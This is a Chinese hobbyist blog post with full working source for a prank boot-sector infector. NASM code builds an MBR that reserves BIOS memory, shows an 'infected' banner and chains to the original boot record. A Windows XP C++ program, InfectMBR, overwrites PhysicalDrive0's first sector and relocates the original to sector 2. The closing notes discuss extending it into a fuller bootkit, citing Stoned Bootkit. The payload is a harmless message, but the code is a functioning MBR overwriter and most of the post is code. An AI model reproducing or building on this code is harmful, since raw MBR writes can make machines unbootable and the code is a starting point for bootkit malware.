你可以调戏一下MBR(裸机的话)

    双休日,吹着空调干代码,nice.(画外音:再宅就等着买老婆吧)T___T,考试神马的一堆要背,但是就是没有动力去背.

    这两天都在搞MBR,群里兄弟说,鬼影和TDL牛不是牛在搞了MBR,而是穿透了部分磁盘还原软件的保护,穿透才是真正的亮点.我表示很赞同.三哥群里说,我逆了病毒,asm2c,然后重新编译,杀毒软件报毒.这是一种神马样的境界,内心一股敬佩之情油然而生.唉,泪流满面,泪流满面..

    郎咸平郎叔曾经说过:这世界上有三种人,一种很聪明,很多东西都是他搞出来的;第二种本一点,他能够看懂第一种人搞了什么;最后一种最笨,什么都不知道.我希望自己能够在巩固第二种人的身份上向第一种人努力.

    今天其实代码量不多的,搞了一个山寨吐槽MBR,搞了一个写入的exe,没了,不过查资料还是学到不少东西的.asm的代码我注释够多了,我一般写代码因为都是自己自娱自乐,注释写很少.

    这个exe主要的工作就是把原来的MBR复制到第二个扇区,然后把山寨吐槽MBR写到第一个扇区,顺便修复一下山寨吐槽MBR的分区活动表,下面附上代码:

 /* ;File: MbrForFun.asm ;Author: GaA.Ra ;E-mail: zhoufan@yahoo.cn ;Date: 2011.6.18 ;Compile: nasm -f bin MbrForFun.asm -o MbrForFun.img ; CPU 486 BITS 16 ;16位实模式 @Initial: xor bx, bx mov ds, bx mov ax, [0x413] ;0x413是BIOS的内存记录区 ;记录的是内存大小,单位是KB ;使用此内存类似栈,从高向低分配 dec ax dec ax ;(ax-2),分配2KB的空间 mov [0x413], ax ;把剩余的空间KB数更新回去 ;这里说明一下,就是剩余的KB数 ;和我们得到的地址起始是有关的 ;也就是ax * 1024就是我们分配的 ;起始地址,可以参考分配图 shl ax, 0x6 ;这里是计算段地址,16位实模式 ;寻址方式为(段地址:偏移) ;计算为(段地址*0x10 + 偏移) mov es, ax ;存入ES寄存器中 mov si, 0x7c00 ;MBR的起始地址 xor di, di ;清空di mov cx, 0x100 ;长度设置为0x100(512字节),一个扇区长度 rep movsw ;把ds:si(0000:7c00)长度512字节内容写到 ;es:di地址处,这里是复制自身到固定内存 push es ;es段入栈 push word @Main ;@Main的地址(16位) retf ;远返回,返回到es:@Main,就是返回到我们 ;复制自身地址的@Main里执行 ; ; @Main: call @DisplayMessage ;显示一些吐槽的东西 call @GetReturn ;获取用户输入的回车 call @BootOS ;跳去正常启动操作系统 ; ; @DisplayMessage: mov bp, TitleMessage mov cx, 0x139 ;cx存放TitleMessage的长度 mov ax, 0x1301 ;ah:0x13表示13号子功能 ;al:0x1表示显示方式 mov bx, 0x000c ;bh:0x0表示当前页 ;bl:0xc表示字符属性(红字) xor dx, dx ;dh表示行坐标,dl表示列坐标 int 10h ;0x10号中断,显示服务 ret ; ; @GetReturn: mov ah, 0 ;ah:0x0表示0号子功能,读键盘 int 16h ;0x16号中断,键盘服务 ;ah为键盘扫描码,al为ASCII码 and ax, 0xff cmp al, 0xd ;判断是否是回车 jnz @GetReturn ;不是则继续读取 ret ; ; @BootOS: mov es, dx ;dx:0x0,把es置为0 mov ax, 0x201 ;ah:0x2表示2号子功能 ;al:0x1表示读取的扇区数为1 mov cx, 0x2 ;ch:0x0表示柱面为0 ;cl:0x1表示读取的扇区是2 ;第2扇区保存的是原来的MBR mov dx, 0x80 ;DL:0x80表示读取的是硬盘 mov bx, 0x7c00 ;es:bx(0000:7c00)为缓冲区地址 int 13h ;0x13号中断,直接磁盘服务 jmp 0x0:0x7c00 ;跳回原来正常的MBR执行启动 ; ; InfectedFlag db "LOLI" ;MBR的感染标示,啊哈哈哈哈 TitleMessage db "+-----------------------------------------+", 0xa, 0xd, db "| MbrForFun.Bin |", 0xa, 0xd, db "| GaA.Ra |", 0xa, 0xd, db "| zhoufan@yahoo.cn |", 0xa, 0xd, db "+-----------------------------------------+", 0xa, 0xd, db "[-]Your Computer is infected by a evil Loli", 0xa, 0xd db "[-]Now Press Enter, Let's return to your OS" ; ; times 510-($-$$) db 0 ;代码数据后面用0填充到510字节 BootSignature dw 0AA55h ;MBR的标志,必须要有的 times 1474560-512 db 0 ;我是直接生成1.44MB的img文件 ;方便用bochs调试,不需要的同学 ;自己注释掉吧 ; */

/*++ @file MbrForFun.h @auth GaA.Ra @date 2011.6.18 for Windows XP only --*/ #ifndef _MBRFORFUN_H #define _MBRFORFUN_H #include <stdio.h> #include <windows.h> #define SECTOR_SIZE 512 #define DRIVER_SYMLINK L".//PHYSICALDRIVE0" unsigned char MBR[512] = { 0x31, 0xDB, 0x8E, 0xDB, 0xA1, 0x13, 0x04, 0x48, 0x48, 0xA3, 0x13, 0x04, 0xC1, 0xE0, 0x06, 0x8E, 0xC0, 0xBE, 0x00, 0x7C, 0x31, 0xFF, 0xB9, 0x00, 0x01, 0xF3, 0xA5, 0x06, 0x68, 0x20, 0x00, 0xCB, 0xE8, 0x06, 0x00, 0xE8, 0x14, 0x00, 0xE8, 0x1D, 0x00, 0xBD, 0x5F, 0x00, 0xB9, 0x39, 0x01, 0xB8, 0x01, 0x13, 0xBB, 0x0C, 0x00, 0x31, 0xD2, 0xCD, 0x10, 0xC3, 0xB4, 0x00, 0xCD, 0x16, 0x25, 0xFF, 0x00, 0x3C, 0x0D, 0x75, 0xF5, 0xC3, 0x8E, 0xC2, 0xB8, 0x01, 0x02, 0xB9, 0x02, 0x00, 0xBA, 0x80, 0x00, 0xBB, 0x00, 0x7C, 0xCD, 0x13, 0xEA, 0x00, 0x7C, 0x00, 0x00, 0x4C, 0x4F, 0x4C, 0x49, 0x2B, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2B, 0x0A, 0x0D, 0x7C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x4D, 0x62, 0x72, 0x46, 0x6F, 0x72, 0x46, 0x75, 0x6E, 0x2E, 0x42, 0x69, 0x6E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x0A, 0x0D, 0x7C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x47, 0x61, 0x41, 0x2E, 0x52, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x0A, 0x0D, 0x7C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7A, 0x68, 0x6F, 0x75, 0x66, 0x61, 0x6E, 0x40, 0x79, 0x61, 0x68, 0x6F, 0x6F, 0x2E, 0x63, 0x6E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x0A, 0x0D, 0x2B, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2B, 0x0A, 0x0D, 0x5B, 0x2D, 0x5D, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x43, 0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x69, 0x73, 0x20, 0x69, 0x6E, 0x66, 0x65, 0x63, 0x74, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20, 0x61, 0x20, 0x65, 0x76, 0x69, 0x6C, 0x20, 0x4C, 0x6F, 0x6C, 0x69, 0x0A, 0x0D, 0x5B, 0x2D, 0x5D, 0x4E, 0x6F, 0x77, 0x20, 0x50, 0x72, 0x65, 0x73, 0x73, 0x20, 0x45, 0x6E, 0x74, 0x65, 0x72, 0x2C, 0x20, 0x4C, 0x65, 0x74, 0x27, 0x73, 0x20, 0x72, 0x65, 0x74, 0x75, 0x72, 0x6E, 0x20, 0x74, 0x6F, 0x20, 0x79, 0x6F, 0x75, 0x72, 0x20, 0x4F, 0x53, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA }; /*------------------------------------------------------------------- ;File: MbrForFun.asm ; CPU 486 BITS 16 @Initial: xor bx, bx mov ds, bx mov ax, [0x413] dec ax dec ax mov [0x413], ax shl ax, 0x6 mov es, ax mov si, 0x7c00 xor di, di mov cx, 0x100 rep movsw push es push word @Main retf ; ; @Main: call @DisplayMessage call @GetReturn call @BootOS ; ; @DisplayMessage: mov bp, TitleMessage mov cx, 0x139 mov ax, 0x1301 mov bx, 0x000c xor dx, dx int 10h ret ; ; @GetReturn: mov ah, 0 int 16h and ax, 0xff cmp al, 0xd jnz @GetReturn ret ; ; @BootOS: mov es, dx mov ax, 0x201 mov cx, 0x2 mov dx, 0x80 mov bx, 0x7c00 int 13h jmp 0x0:0x7c00 ; ; InfectedFlag db "LOLI" TitleMessage db "+-----------------------------------------+", 0xa, 0xd, db "| MbrForFun.Bin |", 0xa, 0xd, db "| GaA.Ra |", 0xa, 0xd, db "| zhoufan@yahoo.cn |", 0xa, 0xd, db "+-----------------------------------------+", 0xa, 0xd, db "[-]Your Computer is infected by a evil Loli", 0xa, 0xd db "[-]Now Press Enter, Let's return to your OS" ; ; times 510-($-$$) db 0 BootSignature dw 0AA55h ; -------------------------------------------------------------------*/ VOID InfectMBR(); #endif

/*++ @file MbrForFun.cpp @auth GaA.Ra @date 2011.6.18 for Windows XP only --*/ #include "MbrForFun.h" int main(int argc, char* argv[]) { printf("Are U Ready!/n"); system("PAUSE"); InfectMBR(); return 0; } VOID InfectMBR() { HANDLE hDisk; BYTE* pOriMBR; DWORD Length; hDisk = CreateFile( DRIVER_SYMLINK, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if (INVALID_HANDLE_VALUE == hDisk) { printf("Open DISK error/n"); return; } pOriMBR = (BYTE*)VirtualAlloc(NULL, SECTOR_SIZE, MEM_COMMIT, PAGE_READWRITE | PAGE_NOCACHE); if (NULL == pOriMBR) { printf("VirtualAlloc() Error!/n"); return; } SetFilePointer(hDisk, 0, NULL, FILE_BEGIN); if (!ReadFile(hDisk, pOriMBR, SECTOR_SIZE, &Length, NULL)) { printf("ReadFile() Error!/n"); return; } //将原来的MBR写入第二个扇区里面 SetFilePointer(hDisk, SECTOR_SIZE, NULL, FILE_BEGIN); if (!WriteFile(hDisk, pOriMBR, SECTOR_SIZE, &Length, NULL)) { printf("WriteFile() Error!/n"); return; } //修复我们MBR当中的分区表 memcpy(&MBR[0x1be], pOriMBR+0x1be, 4 * 16); SetFilePointer(hDisk, 0, NULL, FILE_BEGIN); if (!WriteFile(hDisk, MBR, SECTOR_SIZE, &Length, NULL)) { printf("WriteFile() MBR Error!/n"); return; } VirtualFree(pOriMBR, SECTOR_SIZE, MEM_RELEASE); CloseHandle(hDisk); return; }

    asm用来编译MBR,.h和.cpp编译成exe,MBR提取出来就是.h里面的unsigned char MBR[512].

    感染之后效果如图:

    回车之后是可以正常进入操作系统的.

    一点思考:

1.对于磁盘前端的空闲,我从WinHex里面看到自己虚拟机的空闲扇区大概有28KB,也就是有56个扇区,这部分空间大可以利用起来,因为MBR里面代码的长度最长是0x1BE,像我这里代码是很少,多的都是吐槽用的TitleMessage,利用好这56个扇区可以完成更强大的功能(代码里面已经演示了如何读取一个扇区的内容并加载到内存当中),在Stoned Bootkit当中作者是使用了前63个扇区.

2.对于可以使用的内存,Bochs调试从[0x413]当中得到的数据是大概有0x27fKB,很够用,而且复制进去之后是固定内存,进入操作系统之后可以搜索到这部分数据,如图(标志:LOLI,啊哈哈哈哈),现在关键的问题有两个,在实模式16位的汇编下如何转换或者说进入32位保护模式的地址空间?另外一个是进入操作系统后保护模式下虚拟地址和真实物理地址之间怎么去转换?还要继续研究研究,求达人指点,拜谢.

    末尾的吐槽:我爱银魂!!!怀念跟兄弟们一起sb的日子!!!

    最后附上一些有用的资料:

[1].Bochs调试命令

http://bochs.sourceforge.net/cgi-bin/topper.pl?name=New+Bochs+Documentation&url=http://bochs.sourceforge.net/doc/docbook/user/index.html

[2].BIOS和DOS中断大全

http://linux.chinaunix.net/techdoc/install/2008/08/26/1028043.shtml